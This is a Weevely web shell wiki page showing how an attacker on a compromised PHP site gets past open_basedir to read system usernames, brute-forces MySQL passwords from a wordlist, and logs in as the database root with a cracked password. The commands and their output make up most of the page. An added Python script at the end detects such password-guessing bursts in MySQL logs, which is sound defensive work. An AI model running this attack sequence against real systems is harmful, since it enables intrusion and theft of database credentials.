Bruteforce SQL credentials

epinna edited this page Sep 20, 2014 · 1 revision

This example shows how to bruteforce credentials of multiple SQL users.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system and open_basedir = /var/www/html/
  • Used modules: audit_etcpasswd, bruteforce_sql, and sql_console

Session

Gather as many system usernames as we can. Even if the open_basedir hardening does not allow any access outside the web folder and we can't execute system commands, we can still enumerate the system users using the audit_etcpasswd module.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_1.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

www-data@target:/var/www/html PHP> cd ..
[-][cd] Failed cd '..': no such directory or permission denied
www-data@target:/var/www/html PHP> cat /etc/passwd
[-][download] File download failed, please check remote path and permissions
www-data@target:/var/www/html PHP> :audit_etcpasswd -real
root:x:0:0:root:/root:/bin/bash
roblast:x:1000:1000:roblast,,,:/home/roblast:/bin/bash
micjanost:x:1001:1001:micjanost,,,:/home/micjanost:/bin/bash
pjgomes:x:1002:1002:pjgomes,,,:/home/pjgomes:/bin/bash
pdpeers:x:1003:1003:pdpeers,,,:/home/pdpeers:/bin/bash
www-data@target:/var/www/html PHP>

We got 5 usernames that we can try to bruteforce to find the SQL password. Launch the SQL bruteforce module, using the local file wordlists/huge.txt as the password wordlist.

www-data@target:/var/www/html PHP> :bruteforce_sql

error: too few arguments
usage: bruteforce_sql [-h] [-hostname HOSTNAME] [-users [USERS [USERS ...]]]
                      [-pwds [PWDS [PWDS ...]]] [-fusers FUSERS]
                      [-fpwds FPWDS]
                      {mysql,pgsql}

Bruteforce SQL database

positional arguments:
  {mysql,pgsql}         Service to bruteforce

optional arguments:
  -h, --help            show this help message and exit
  -hostname HOSTNAME    Hostname
  -users [USERS [USERS ...]]
                        Users
  -pwds [PWDS [PWDS ...]]
                        Passwords
  -fusers FUSERS        Local file path containing users list
  -fpwds FPWDS          Local file path containing password list

www-data@target:/var/www/html PHP> :bruteforce_sql mysql -users roblast micjanost pjgomes pdpeers root -fpwds wordlists/huge.txt 
roblast:reckoned
pjgomes:national
root:Gilchrist
www-data@target:/var/www/html PHP>

In a few seconds we got 3 out of 5 credentials. Use sql_console to check the accounts found.

www-data@target:/var/www/html PHP> :sql_console -u root -p Gilchrist
root@localhost SQL> show databases;
+--------------------+
| mysql              |
| performance_schema |
| test               |
| appdb              |
+--------------------+
root@localhost SQL> 

:)
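
Seen from the database side, as an added example that is not part of the original wiki page or of Weevely: the sql_console prompt above shows root@localhost, so the guesses reach MySQL as local connections and the database's own log is where they become visible. The sketch assumes MySQL 5.7-style error-log lines with access-denied logging enabled (log_error_verbosity=3); the sample lines, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line shape: "<ISO timestamp> <thread id> [Note] Access denied for user 'u'@'h' ..."
DENIED = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[Note\]\s+Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def build_sample():
    """Constructed log: 20 failures over 4 users in 2 s from localhost, plus one stray failure."""
    t0 = datetime(2014, 9, 20, 10, 15, 0)
    users = ["roblast", "micjanost", "pjgomes", "root"]
    lines = []
    for i in range(20):
        ts = (t0 + timedelta(milliseconds=100 * i)).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
        lines.append(f"{ts} {40 + i} [Note] Access denied for user "
                     f"'{users[i % 4]}'@'localhost' (using password: YES)")
    lines.append("2014-09-20T11:00:00.000000Z 90 [Note] Access denied for user "
                 "'appuser'@'10.0.0.7' (using password: YES)")
    return lines

def detect_bursts(lines, window=timedelta(seconds=60), min_failures=10, min_users=3):
    """Return {host: sorted users} for hosts that exceed both thresholds inside one window."""
    recent = defaultdict(deque)  # host -> (timestamp, user) pairs still inside the window
    alerts = {}
    for line in lines:
        m = DENIED.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ")
        q = recent[m["host"]]
        q.append((ts, m["user"]))
        while ts - q[0][0] > window:  # drop failures older than the window
            q.popleft()
        users = {u for _, u in q}
        # Many failures spread over several accounts from one source is the
        # signature of a multi-user wordlist run, unlike a single mistyped password.
        if len(q) >= min_failures and len(users) >= min_users:
            alerts.setdefault(m["host"], set()).update(users)
    return {h: sorted(u) for h, u in alerts.items()}

if __name__ == "__main__":
    for host, users in detect_bursts(build_sample()).items():
        print(f"ALERT: password guessing from {host} against {users}")
```

Requiring several distinct usernames in the window keeps a single application with a stale password from raising the same alert.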